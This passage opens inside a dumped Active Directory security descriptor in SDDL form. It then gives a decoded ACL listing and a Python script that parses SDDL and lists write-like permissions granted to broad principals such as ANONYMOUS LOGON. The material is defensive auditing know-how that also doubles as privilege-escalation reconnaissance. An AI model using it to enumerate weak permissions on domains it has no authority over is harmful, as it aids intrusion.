6050;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;275b2f54-982d-4dcd-b0ad-e53501445efb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967954-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;bf967961-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf967a68-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5fd42471-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;5430e777-c3ea-4024-902e-dde192204669;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;6f606079-3a82-4c1b-8efb-dcc8c91d26fe;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;bf967a7a-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;bf967a7f-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;614aea82-abc6-4dd0-a148-d67a59c72816;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;66437984-c3c5-498f-b269-987819ef484b;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;77b5b886-944a-11d1-aebd-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;a8df7489-c5ea-11d1-bbcb-0080c76670c0;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;1f298a89-de98-47b8-b5cd-572ad53d267e;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;f0f8ff9a-1191-11d0-a060-00aa006c33ed;
;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;2cc06e9d-6f7e-426a-8825-0215de176e11;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;5fd424a1-1262-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;3263e3b8-fd6b-4c60-87f2-34bdaa9d69eb;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;WP;28630ebc-41d5-11d1-a9c1-0000f80367c1;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;WP;bf9679c0-0de6-11d0-a285-00aa003049e2;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;3e0abfd0-126a-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;WP;7cb4c7d3-8787-42b0-b438-3c5d479ad31e;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-526)(OA;CI;RPWP;5b47d60f-6090-40b2-9f37-2a4de88f3063;;S-1-5-21-3842939050-3880317879-2865463114-527)(OA;CI;DTWD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;DTWD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CI;CCDCLCRPWPLO;f0f8ffac-1191-11d0-a060-00aa006c33ed;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CI;CCDCLCRPWPLO;e8b2aff2-59a7-4eac-9a70-819adef701dd;;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5172)(OA;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;018849b0-a981-11d2-a9ff-00c04f8eedd8;;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SD;;4828cc14-1437-45bc-9b07-ad6f015e5f28;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a86-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050
-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aa5-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;bf967aba-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;SD;;5cb41ed0-0e4c-11d0-a286-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5189)(OA;CIIO;WD;;bf967a9c-0de6-11d0-a285-00aa003049e2;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;CO)(OA;CIIO;SW;9b026da6-0d3c-465c-8bee-5199d7165cba;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;c975c901-6cea-4b6f-8319-d67f45449506;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CIIO;CCDCLCSWRPWPDTLOCRSDRCWDWO;;f0f8ffac-1191-11d0-a060-00aa006c33ed;S-1-5-21-3842939050-3880317879-2865463114-5187)(OA;CINPIO;RPWPLOSD;;e8b2aff2-59a7-4eac-9a70-819adef701dd;S-1-5-21-3842939050-3880317879-2865463114-5186)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e
-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;CI;RP;b1b3a417-ec55-4191-b327-b72e33e38af2;;NS)(OA;CI;RP;1f298a89-de98-47b8-b5cd-572ad53d267e;;AU)(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;LCSWRPWPRC;;;S-1-5-21-3842939050-3880317879-2865463114-5213)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5172)(A;CI;LCRPLORC;;;S-1-5-21-3842939050-3880317879-2865463114-5187)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-3842939050-3880317879-2865463114-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)(A;CI;LCRPWPRC;;;AN)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD)"
Owner : BUILTIN\Administrators
Group : BUILTIN\Administrators
DiscretionaryAcl : {Everyone: AccessDenied (WriteData), Everyone: AccessAllowed (WriteExtendedAttributes), NT
AUTHORITY\ANONYMOUS LOGON: AccessAllowed (CreateDirectories, GenericExecute, ReadPermissions,
Traverse, WriteExtendedAttributes), NT AUTHORITY\ENTERPRISE DOMAIN CONTROLLERS: AccessAllowed
(CreateDirectories, GenericExecute, GenericRead, ReadAttributes, ReadPermissions,
WriteExtendedAttributes)...}
SystemAcl : {Everyone: SystemAudit SuccessfulAccess (ChangePermissions, TakeOwnership, Traverse),
BUILTIN\Administrators: SystemAudit SuccessfulAccess (WriteAttributes), DOMAIN_NAME\Domain Users:
SystemAudit SuccessfulAccess (WriteAttributes), Everyone: SystemAudit SuccessfulAccess
(Traverse)...}
RawDescriptor : System.Security.AccessControl.CommonSecurityDescriptor
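The SDDL string and the decoded ACL above are two views of the same security descriptor. The decoded listing renders the access masks with file-system right names (the 0x20 bit, WriteProperty on a directory object, shows up as Traverse), which is hard to read for Active Directory permissions. As an added example, not code from the page or from HackTricks, the following Python script parses an SDDL string into owner, group, DACL and SACL using the documented two-letter tokens, decodes rights written either as tokens or as a hex mask, and lists the allow ACEs that grant write-like rights to broad principals, which is the check a reviewer usually wants from such output. The sample descriptor is constructed from ACEs that appear on the page; the trustee alias table and the "broad principal" set are subsets chosen for illustration.

```python
"""Decode Windows SDDL security-descriptor strings into readable ACEs (added example)."""
import re
from dataclasses import dataclass, field
from typing import List, Tuple

# Two-letter SDDL tokens (subset). The same letters mean different things in
# different fields: "WD" is WriteDac in the rights field but Everyone in the
# trustee field, so every field is decoded with its own table, by position.
ACE_TYPES = {"A": "AccessAllowed", "D": "AccessDenied", "OA": "ObjectAccessAllowed",
             "OD": "ObjectAccessDenied", "AU": "SystemAudit", "OU": "ObjectSystemAudit"}
ACE_FLAGS = {"CI": "ContainerInherit", "OI": "ObjectInherit", "NP": "NoPropagateInherit",
             "IO": "InheritOnly", "ID": "Inherited", "SA": "SuccessfulAccess",
             "FA": "FailedAccess"}
# Right token -> (name, ACCESS_MASK bit). The bits are the directory-service
# ADS_RIGHT_* values and are used when the field is a hex mask instead of tokens.
RIGHTS = {"CC": ("CreateChild", 0x1), "DC": ("DeleteChild", 0x2), "LC": ("ListChildren", 0x4),
          "SW": ("Self", 0x8), "RP": ("ReadProperty", 0x10), "WP": ("WriteProperty", 0x20),
          "DT": ("DeleteTree", 0x40), "LO": ("ListObject", 0x80), "CR": ("ControlAccess", 0x100),
          "SD": ("Delete", 0x10000), "RC": ("ReadControl", 0x20000), "WD": ("WriteDac", 0x40000),
          "WO": ("WriteOwner", 0x80000), "GA": ("GenericAll", 0x10000000),
          "GX": ("GenericExecute", 0x20000000), "GW": ("GenericWrite", 0x40000000),
          "GR": ("GenericRead", 0x80000000)}
TRUSTEES = {"AN": "ANONYMOUS LOGON", "AU": "Authenticated Users", "BA": "BUILTIN\\Administrators",
            "CO": "CREATOR OWNER", "DA": "Domain Admins", "DU": "Domain Users",
            "ED": "ENTERPRISE DOMAIN CONTROLLERS", "NS": "NETWORK SERVICE", "PS": "SELF",
            "RU": "Pre-Windows 2000 Compatible Access", "SY": "SYSTEM", "WD": "Everyone"}
CONTROL = {"P": "Protected", "AI": "AutoInherited", "AR": "AutoInheritRequired"}


@dataclass
class Ace:
    ace_type: str
    flags: List[str]
    rights: List[str]
    object_guid: str           # property / property-set / extended-right GUID; "" = whole object
    inherited_object_guid: str
    trustee: str
    raw: str


@dataclass
class SecurityDescriptor:
    owner: str
    group: str
    dacl_flags: List[str] = field(default_factory=list)
    dacl: List[Ace] = field(default_factory=list)
    sacl_flags: List[str] = field(default_factory=list)
    sacl: List[Ace] = field(default_factory=list)


def _pairs(s: str) -> List[str]:
    return [s[i:i + 2] for i in range(0, len(s), 2)]


def decode_rights(rights: str) -> List[str]:
    """Decode the rights field in token form ("LCRPWPRC") or hex-mask form ("0x20034")."""
    if rights.lower().startswith("0x"):
        mask = int(rights, 16)
        return [name for name, bit in RIGHTS.values() if mask & bit]
    return [RIGHTS[t][0] if t in RIGHTS else t for t in _pairs(rights)]


def _decode_control(s: str) -> List[str]:
    out, i = [], 0
    while i < len(s):
        width = 1 if s[i] == "P" else 2      # "P" is the only one-letter control token
        out.append(CONTROL.get(s[i:i + width], s[i:i + width]))
        i += width
    return out


def parse_ace(ace: str) -> Ace:
    body = ace.strip()
    if not (body.startswith("(") and body.endswith(")")):
        raise ValueError("not an ACE string: %r" % ace)
    fields = body[1:-1].split(";")
    if len(fields) < 6:                      # conditional ACEs add a 7th field; six are enough here
        raise ValueError("expected at least 6 fields: %r" % ace)
    t, fl, rights, obj, inh, sid = fields[:6]
    return Ace(ACE_TYPES.get(t, t), [ACE_FLAGS.get(f, f) for f in _pairs(fl)],
               decode_rights(rights), obj, inh, TRUSTEES.get(sid, sid), body)


_SDDL = re.compile(
    r"^(?:O:(?P<owner>[^:()]+?))?(?:G:(?P<group>[^:()]+?))?"
    r"(?:D:(?P<dflags>[A-Z]*)(?P<dacl>(?:\([^)]*\))*))?"
    r"(?:S:(?P<sflags>[A-Z]*)(?P<sacl>(?:\([^)]*\))*))?$")
_ACE = re.compile(r"\([^)]*\)")


def parse_sddl(sddl: str) -> SecurityDescriptor:
    m = _SDDL.match(sddl.strip())
    if not m:
        raise ValueError("unrecognised SDDL layout")
    g = m.groupdict()
    owner, group = g["owner"] or "", g["group"] or ""
    return SecurityDescriptor(
        TRUSTEES.get(owner, owner), TRUSTEES.get(group, group),
        _decode_control(g["dflags"] or ""), [parse_ace(a) for a in _ACE.findall(g["dacl"] or "")],
        _decode_control(g["sflags"] or ""), [parse_ace(a) for a in _ACE.findall(g["sacl"] or "")])


# Review helper: allow ACEs that hand write-like rights to broad principals.
WRITE_LIKE = {"GenericAll", "GenericWrite", "WriteDac", "WriteOwner", "WriteProperty",
              "CreateChild", "DeleteChild", "DeleteTree", "Delete"}
BROAD_TRUSTEES = {"Everyone", "Authenticated Users", "ANONYMOUS LOGON", "Domain Users",
                  "Pre-Windows 2000 Compatible Access"}   # illustrative subset


def find_broad_write_grants(sd: SecurityDescriptor) -> List[Tuple[str, str, str]]:
    hits = []
    for ace in sd.dacl:
        if not ace.ace_type.endswith("AccessAllowed") or ace.trustee not in BROAD_TRUSTEES:
            continue
        granted = sorted(set(ace.rights) & WRITE_LIKE)
        if granted:
            scope = "whole object" if not ace.object_guid else "object GUID " + ace.object_guid
            hits.append((ace.trustee, ",".join(granted), scope))
    return hits


# Constructed sample: owner/group from the page's output plus a few ACEs copied from its SDDL.
SAMPLE_SDDL = ("O:BAG:BAD:AI(A;;RP;;;WD)(A;CI;LCRPWPRC;;;AN)"
               "(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)"
               "(OA;CI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)"
               "(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(AU;SA;WPWDWO;;;WD)")

if __name__ == "__main__":
    sd = parse_sddl(SAMPLE_SDDL)
    print("Owner:", sd.owner, "| Group:", sd.group, "| DACL flags:", sd.dacl_flags)
    for a in sd.dacl + sd.sacl:
        print(f"{a.ace_type:<20} {a.trustee:<36} {','.join(a.flags) or '-':<18} "
              f"{','.join(a.rights)}  {a.object_guid or '(whole object)'}")
    print("broad write grants:", find_broad_write_grants(sd))
```

Run on the sample, the script reports the same thing the decoded listing above says in file-system vocabulary: ANONYMOUS LOGON holds WriteProperty (plus ListChildren, ReadProperty and ReadControl) on the whole object, while the Everyone entry is read-only and the SELF entry's WriteProperty is confined to one property GUID. Real descriptors often carry hex masks instead of tokens and can contain seventh-field conditional ACEs; the parser decodes the former and deliberately ignores the latter field.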